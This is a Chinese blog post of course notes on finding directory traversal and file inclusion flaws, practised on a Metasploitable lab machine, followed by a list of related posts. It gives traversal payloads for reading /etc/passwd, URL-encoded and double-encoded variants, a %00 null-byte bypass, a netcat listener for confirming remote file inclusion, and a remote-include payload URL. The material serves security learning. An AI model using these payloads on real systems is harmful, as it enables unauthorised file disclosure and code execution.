3.手动挖掘漏洞,详细解说,明实验和使用 文件便利,远程文件包含,本地文件包含

最新推荐文章于 2024-02-14 22:27:18 发布
最新推荐文章于 2024-02-14 22:27:18 发布
阅读量354 收藏 1
点赞数
分类专栏: 漏洞 手动漏洞挖掘 笔记 文章标签: 文件便利 远程文件包含 本地文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41860876/article/details/100917982
版权

任务087:手动漏洞挖掘(三)

手动漏洞挖掘一定要大量的进行尝试在尝,有的时候一天都找不到漏洞也是属于正常的

  1. Directory traversal (目录便利)
    目录便利漏洞: 正常情况下都是访问www里的文件。通过URL地址和参数地址从而访问到www以外的目录或文件,要是你用权限比较高的话运行服务器那么访问其他目录的权限就比较高就是服务器软件的权限

  2. File include(文件包含)
    文件包含漏洞:比如php的include函数他可以吧www文件以外的目录 include到页面里,其实正常情况下程序员不会这样设计程序的,通常是设计有漏洞导致的include函数过滤不严格所导致的

  3. 文件包含和目录便利都是可以查看到其他目录的文件,有的人都会把他搞成一样,其实详细来说是有区别的

  4. 明显特征
    URL里如果有?配置=文件名就要注意了,后面的值是页面文件,这样可能就存在漏洞的地
    列如URL里有

    ?page=a.php   
?home=b.html
?file=content

    这个file=文件名就要警戒起来,可能也是通过 include函数来调用的
    也有可能=页面文件名的也可能是在www文件里的都是也可以修改如?page=其他文件,看看能不能叫其他文件包含过来

  5. 进行测试 实验靶机metasploitable-linux-2.0.0
    可以看到这个URL
    在这里插入图片描述5漏洞测试本地文件包含显示/etc/passwd的内容
    使用怎么参数来显示…/…/…/…/…/…/…/…/…//etc/passwd
    前是这个…/是进入到上个目录的命令多个…/,其实和cd …一样
    下面是…/…/…/…/…/…/…/…/…/他的作用
    5.1.1一个…/效果
    不能会到上一层
    在这里插入图片描述
    5.1.2多个…/
    一个就是会到上一个目录二个就是会到上上层目录
    在这里插入图片描述
    5.1.3这个…/…/…/…/…/…/…/…/…//etc/passwd就是像从最低目录开始查看/etc/passwd
    可以看到页面已经出现passwd文件的内容了
    在这里插入图片描述
    其实linux都是从/目录开始不像win系统所以服务器是linux系统可以应为靶机就是linux系统可以直接标明绝对路径就可以了
    在这里插入图片描述
    5.2.0使用这个URL///etc/passwd来查看passwd
    在这里插入图片描述

  6. 编码绕过字符,过滤
    有的web发现你访问的是文件名的时候可能就会自动添加.php
    比如我们要访问/etc/passwd他就会自动添加/etc/passwd.php就会导致文件访问说没有这个文件
    有的web版本添加“.”和“%00”后面加上这两个的其中一个有可能就吧自动添加.php省略掉,这个%00就等于空字符,遇到%00后的后面的所有字符都被省略了
    服务器过滤128一下的码都是不被URL过滤的都是可以在URL正常显示的服务器不会过滤的
    6.1..和/是有可能是被过滤的
    linux目录都是/什么什么/什么什么,而win系统都是c:\什么什么\什么什么
    常用的绕过过滤的都是使用URL编码来绕过过滤,有的时候一层URL编码没有绕过那就在URL 后在进行一层URL编码也就是二层URL编码,都是你的编码要服务器能识别出来,所有要大量尝试方法。
    6.1.1下面是…/URL编码
    在这里插入图片描述

    使用URL编码来查看/etc/passwd
    …/编码成了%2e%2e%2f
    成这样%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
    还是可以正常查看 的
    在这里插入图片描述
    …/双层编码
    在这里插入图片描述
    …/双层编码来查看/etc/passwd
    …/双层编码后变成%25%32%65%25%32%65%25%32%66
    成这样
    %25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66/etc/passwd
    可以看到是访问不成功的应为这个靶机服务器只能解码一层
    在这里插入图片描述
    本地文件包含只能查看文不能执行文件,其实不然很多情况下也可以执行代码的
    本地文件下面演示一下代码执行,有很多种方法,下面就演示其中常适用用的一种这个应为我没有找到所有

  7. 远程文件包含
    先做一次验证在kali用nc监听80端口
    nc -nvlp 80
    在这里插入图片描述
    在靶机是请求会请求到kali这个服务器上
    在这里插入图片描述
    看见kali已经看到请求了
    在这里插入图片描述

作者qq2737977997

w啥都学
关注
专栏目录
文件包含漏洞挖掘(一)
记录并分享学习安全的知识点..
02-07 1994
一、概述 文件包含漏洞是指通过构造一个恶意URL来读取非WEB目录中的文件。正常情况下用户通过浏览器访问的范围被限制在被限制在WEB目录里,系统中的其他目录是无法访问的。 以PHP为例,服务器在执行一个PHP文件的时候,可以加载并执行其他文件的php代码,这个功能是通过以下四个函数其中之一来实现的: (1)incllude() (2)require() (3)include_once() (4)requre() 其中以include为例,作用是将文件包含进来,如果发生错误就会警告,并继
手动挖掘漏洞(二)目录遍历,文件包含
weixin_30337251的博客
07-08 250
在进行漏洞观察时候,一个是要观察页面上的敏感信息(php=,file=),二个是观察网页url地址,例如: page遍历等于一个重定向页面,如果我们进行修改: 加入../../../../etc/passwd,让他跳转至根目录,在跳转至我们的目的文件: 或者我们直接填写:/etc/passwd : 效果一样 或者可以进行file:///etc/passwd 以...
DVWA系列之16 文件包含漏洞挖掘与防御
weixin_33921089的博客
12-23 276
下面我们来分析一下DVWA中文件包含漏洞的源码。首先文件包含的主页面是D:\AppServ\www\dvwa\vulnerabilities\fi\index.php文件文件中的主要代码部分:在这段代码中,首先使用switch语句根据用户选择的安全级别,分别将low.php、medium.php、high.php赋值给变量$vulnerabilityFile,接下来使用require_once函...
Kali Linux渗透测试 087 手动漏洞挖掘-目录遍历、文件包含漏洞
kevinhanser
03-22 2402
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 目录遍历和文件包含 1. 两种漏洞放在一起进行测试 2. 设置 dvwa 可以进行远程文件包含测试 3. 漏洞特征 4. 经典测试方法 5. 绕过字符过滤 6. cookie 注入目录遍...
白帽子挖洞—文件包含(File Inclusion )
蚁景网安学院
09-13 519
点击“合天智汇”关注,学习网安干货 0x00 介绍 文件包含漏洞:即File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就...
4,手动挖掘漏洞详细解说实验使用 1,文件上发漏洞
qq_41860876的博客
09-24 450
任务088:手动漏洞挖掘(四) 在kali有存在典型通俗的字典文件 在kali下/usr/share/wfuzz/wordlist不同的类型都放在不同的文件里 下面简单介绍一下 1, 文件一general 里面都是放的是猜网站文件目录的 big.txt 对子目录的爆破的字典 http_methods.txt http方法的字典 2,文件二Injections进行注入的 bad_...
5,手动挖掘漏洞详细解说实验使用 2,文件上发漏洞
qq_41860876的博客
09-24 341
可以查看a.php是什么内型的 a.php文件内容 文件类型是从前大概10个字节进行定义的 查看前10字节可以判断文件类型 把a.php修改成a.txt 查看类型还是php类型应为他先看你的文件头然后在查看文件的具体内容 靶机安全级别高上发a.php木马文件只能发送照片 正常访问是可以正常上发的 上发a.php就不能上发过去了 修改文件类型也是上发过去的发送a.php是个木马 没有修改的 ...
SMT32 启动文件详细解说
08-30
STM32 启动文件详细解说 STM32 启动文件是指 Bootloader,它封装了 STM32 的启动流程。无论是在开发 STM32 的时候使用库开发还是使用寄存器来开发,理解 STM32 的启动流程都是最重要的。下面是对 STM32 启动文件的...
HDFS HA 高可用部署日志文件,全代码,详细步骤解说(202302070418)
最新发布
09-30
NameNode 机器需要升级,包括软件、硬件升级,此时集群也将无法使用 HDFS HA 功能通过配置 Active/Standby 两个 nameNodes 实现在集群中对 NameNode 的 热备来解决上述问题。如果出现故障,如机器崩溃或机器需要升级...
传奇3客户端文件传奇三客户端文件解说_传奇3_传奇_传奇3源代码_
10-04
"传奇3"作为一款经典的网络游戏,其客户端文件不仅包含游戏界面、角色模型、音效等基础元素,还涉及复杂的逻辑处理和网络通信功能。本文将深入探讨"传奇3"客户端文件的构成与功能,旨在为玩家和开发者提供详尽的理解...
Linux文件系统目录结构的详细解说2.pdf
10-07
Linux 文件系统目录结构的详细解说 Linux 文件系统目录结构是 Linux 操作系统的根目录结构,它是 Linux 文件系统的组织者,也是最上级的领导者。 Linux 文件系统的目录结构可以用树形结构来形象地描述。在 Linux ...
IDEA不编译除了.java之外的文件的解决办法(推荐)
08-18
本文将详细介绍这个问题的解决办法,并提供了详细的图文解说。 问题的根源 ---------- 在使用IDEA时,开发者可能会遇到一个问题,即IDEA不编译除了.java之外的文件。这是因为Maven默认只识别src-main-resources下...
BTS测试实验室--远程文件包含和服务器端注入攻略
wkend的博客
10-28 559
远程文件包含 构造payload:http://127.0.0.1/btslab/vulnerability/rfi/RFI.php?file=http://192.168.1.129/test2/demo1.php 可以看到,远程包含的文件被解析执行了。 下面来看看远程文件中的内容是什么? 所以说,对于存在远程文件包含漏洞的情况,会造成任意代码被执行的危害。有关这个漏洞更多的实例或讲解,可...
文件包含实验
weixin_46831054的博客
02-28 4525
原理: 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有 经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意 的代码注入。 几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计 的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。 使用的函数: include():找不到被包含文件时会产生警告(E_WARNING) ; incl
渗透测试之文件包含漏洞
weixin_52177486的博客
02-14 1122
文件包含漏洞:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当作PHP执行,可以给开发者节省大量的时间,从而也导致了客户端可以调用一个恶意文件,造成文件包含漏洞。常见的文件包含函数require()、require_once()、include()、include_once()
文件包含漏洞挖掘(三)
记录并分享学习安全的知识点..
02-08 954
文件包含漏洞挖掘(一)|CSDN创作打卡》_xiaofengdada的博客-CSDN博客 《文件包含漏洞挖掘(二)|CSDN创作打卡》_xiaofengdada的博客-CSDN博客 一、漏洞产生原因 源码采用include危险函数,传入对象参数由用户输入控制,可访问上传的包含文件页面。 二、漏洞利用前提 知道包含文件解析的绝对路径,可访问绝对路径页面 三、常见的为协议分类 file://访问本地文件系统 http://访问HTTP 网址 ftp://访问ftpURL ...
89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解&实战示例]
qwsn
02-01 3610
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、文件包含漏洞详解 1、文件包含漏洞相关概念 2、PHP文件包含漏洞相关概念 3、PHP文件包含漏洞利用:`构造payload` 4、PHP文件包含漏洞利用:`读取铭感文件` 5、PHP文件包含漏洞利用:`简单的目录遍历绕过+截断绕过` 6、PHP文件包含漏洞利用:`文件上传+文件包含-getshell` 7、PHP文件包含漏洞利用:`Apache日志文件包含getshell` 8、PHP文件包含漏洞利用:`远程文件
2.手动挖掘漏洞详细解说实验使用
qq_41860876的博客
09-16 804
任务086:手动漏洞挖掘(二) 这个是我的看的教程的笔记。 里面是我自己实验的照片。 挖掘漏洞原则 挖掘漏洞原则是非常非常重要的 1.1.所有的变量 所有的变量都要去尝试,用各种各样的注入攻击手段尝试每一个变量每一个可以提交的数据的位置都要去尝试提交注入 1.2.所有的头 还要关住HTTP的头也是可以注入信息也可以完成相应的注入应为头也可以判断一个条件 重定要关注cookie(苦k) 1.3....
1.手动挖掘漏洞详细解说实验使用 (身份验证)
qq_41860876的博客
09-14 918
任务086:手动漏洞挖掘(二) 这个是我的看的教程的笔记 身份认证 1.常用弱口令/基于字典密码爆破 2.账号锁定 3.信息收集 手机号 密码错误提示 4.密码嗅探 常用弱口令/基于字典密码爆破 就是像网站登陆账号密码了列账号admin密码123456 账号锁定就是连续密码错误就不在登陆了 信息收集1.手机号像出来的账号里手机号什么什么的排名像18272xxxx15就号找到这个账号2.密码错误...
Linux复制文件命令cp之使用解说
09-15
在Linux操作系统中,`cp`命令是一个非常基础且重要的工具,用于复制文件目录。本文将详细介绍`cp`命令的使用方法,以及如何避免在使用过程中遇到的问题。 首先,让我们了解`cp`命令的基本语法: ```shell cp ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值